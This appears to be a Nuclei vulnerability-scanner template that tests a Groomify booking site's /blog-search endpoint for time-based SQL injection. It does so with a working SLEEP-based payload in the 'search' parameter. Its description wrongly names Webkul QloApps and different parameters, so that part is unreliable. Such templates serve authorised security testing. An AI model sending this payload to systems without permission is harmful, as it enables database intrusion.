id: groomify-sqli info: name: Groomify v1.0 - SQL Injection Vulnerability author: theamanrawat severity: high description: | An unauthenticated Time-Based SQL injection found in Webkul QloApps 1.6.0 via GET parameter date_from, date_to, and id_product allows a remote attacker to bypass a web application's authentication and authorization mechanisms and retrieve the contents of an entire database. reference: - https://codecanyon.net/item/groomify-barbershop-salon-spa-booking-and-ecommerce-platform/45808114# - https://vulners.com/zdt/1337DAY-ID-38799 metadata: verified: "true" max-request: 1 tags: time-based-sqli,sqli,groomify,unauth http: - raw: - | @timeout: 25s GET /blog-search?search=deneme%27%20AND%20(SELECT%201642%20FROM%20(SELECT(SLEEP(6)))Xppf)%20AND%20%27rszk%27=%27rszk HTTP/2 Host: {{Hostname}} matchers-condition: and matchers: - type: dsl dsl: - duration>=6 - status_code == 200 - contains(header, "text/html") - contains(body, 'value=\"deneme') condition: and # digest: 4b0a00483046022100f5673c42a32e3e6f20dd119713e652c4fa84cf2dd2cbf6893f187c87999c8277022100e3a0ad79a58479015e5f9b424277ab9fbbb0231a82d73f3b19c31a3b7d10f245:922c64590222798bb761d5b6d8e72950